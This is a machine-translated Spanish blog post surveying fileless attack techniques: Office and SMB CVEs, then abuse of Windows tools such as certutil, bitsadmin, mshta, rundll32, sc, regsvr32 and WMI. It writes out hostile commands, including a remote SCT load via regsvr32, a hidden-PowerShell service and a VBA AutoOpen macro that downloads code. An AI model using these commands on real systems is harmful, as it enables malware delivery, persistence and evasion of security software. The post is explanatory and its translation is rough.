Tipos de ataques sin archivos

Others 2021-03-30 00:34:30 views: null

En el campo de la seguridad, los ataques sin archivos significan amenazas extremadamente graves. El término "sin archivo" es un término que nació al discutir formas de eludir la tecnología de detección de archivos maliciosos. El "ataque sin archivos" es solo una estrategia de ataque cuyo punto de partida es evitarPoner archivos maliciosos en el disco, Para evadir la detección del software de seguridad tradicional.
Este campo de conocimiento involucra dos áreas principales de análisis inverso de virus y pruebas de penetración.

Tipos de ataques sin archivos

Inserte la descripción de la imagen aquí
Las vulnerabilidades de protocolo y las vulnerabilidades de Office más famosas de los últimos años:

Nombre del virus Tipo de vulnerabilidad Número CVE Ubicación de la vulnerabilidad
Vulnerabilidades de Office CVE-2017-0199 Objeto OLE2LINK incrustado
Vulnerabilidades de Office CVE-2017-11882 (Fórmula 1 de pesadilla) Editor de fórmulas EQNEDT32.EXE
Vulnerabilidades de Office CVE-2018-0802 (Fórmula Pesadilla II) Editor de fórmulas EQNEDT32.EXE
Quiero llorar Vulnerabilidad SMB ms17-010 Puerto 445 del sistema operativo Windows
SQLSlammer (zafiro) Vulnerabilidad WEB - SQLSERVER2000 al analizar el puerto 1434 vulnerabilidad de desbordamiento del búfer

Reproducción y análisis de vulnerabilidades CVE-2018-0802
https://www.freebuf.com/vuls/160386.html

Archivos y métodos utilizados con frecuencia en ataques sin archivos

certutil.exe
Inserte la descripción de la imagen aquí
descarga el archivo de la URL especificada y lo guarda en outfile.file: certuil.exe -urlcache -split -f [URL] outfile.file; codificación y decodificación base64, etc.

Script AutoIT
Utilice la herramienta Autoit3 decompiler-Exe2Aut para descompilar archivos ejecutables.
Enlace de descarga: http://domoticx.com/autoit3-decompiler-exe2aut/

Este programa es un programa de instalación de servicios de certificados en Windows, que puede descargar, codificar y decodificar certificados. En el entorno de penetración real, también podemos usarlo para resolver algunas situaciones en las que no se pueden cargar scripts.

mshta.exe ejecuta el archivo HTA

HTA es la abreviatura de HTML Application (aplicación HTML). Es un nuevo concepto de desarrollo de software. Es un software de aplicación independiente que guarda HTML directamente en formato HTA, que no es diferente de la interfaz de software diseñada por lenguajes de programación como como VB y C ++. Durante mucho tiempo, los archivos HTA se han utilizado como parte de programas maliciosos por ataques web o programas de descarga de malware en estado salvaje. Los archivos HTA son ampliamente conocidos en el campo de la seguridad de la red. Desde la perspectiva de los equipos rojo y azul, es una de las valiosas formas "antiguas" de eludir la lista blanca de aplicaciones.

En la
ventana cmd de bitsadmin , puede usar bitsadmin para evitar el firewall y descargar troyanos

schtasks.exe
panel de control, sistema de seguridad, herramientas de administración, programador de tareas
o programa taskchd.msc abierto directamente La
tarea programada en sí se puede ejecutar con privilegios elevados , sin pasar directamente por las restricciones de UAC

Rundll32.exe
parámetros normales de rundll32.exe: RUNDLL32.EXE nombre dll, punto de entrada, argumentos opcionales

Técnicas utilizadas por Poweliks:

rundll32.exe javascript:”\..\ mshtml,RunHTMLApplication “;alert(‘payload’);

sc.exe

sc create Payloadservice binpath= “C:\Windows\system32\cmd.exe /c start /b /min powershell.exe -nop -w hidden [REMOVED]

regsvr32.exe

Dromedan dropper utilizó regsvr32.exe para cargar archivos DLL maliciosos mediante los siguientes métodos.

regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll

Wmic.exe Los
datos de WMI se almacenan codificados en varios archivos en el% System% \ wbem \ repository
A la organización atacante de Cozyduke le gusta colocar toda la carga útil maliciosa en el repositorio de WMI

Apagar escribir de nuevo

A la organización Dridex le gusta volver a llamar cuando se apaga la máquina para liberar los archivos maliciosos, a fin de minimizar la exposición de archivos maliciosos. De manera similar, el zorro de sangre RootKit usa un período de apagado para liberar controladores maliciosos.

La macro VB llama a WMI y luego llama a powershell

Sub AutoOpen()
[REMOVED]
Set objWMIService = GetObject(“winmgmts:\\” &
strComputer & “\root\cimv2”)
[REMOVED]
objProcess.Create o &-ExecutionPolicy Bypass
-WindowStyle Hidden -noprofile -noexit -c if
([IntPtr]::size -eq 4) {
   
   (new-oabject Net.Webclient.
DownloadString(& [REMOVED]
End Sub

referencias

https://www.cnblogs.com/meandme/p/10337267.html

Utilice tareas programadas y bitsadmin para lograr un control a largo plazo del código malicioso
https://blog.csdn.net/qq_31481187/article/details/57540231

Supongo que te gusta

Origin blog.csdn.net/qq_43312649/article/details/110387172
Recomendado
Clasificación
Diario
Más
2024-06-17(0)
2024-06-16(0)
2024-06-15(0)
2024-06-14(0)
2024-06-13(0)
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)

Code World

© 2018 codetd.com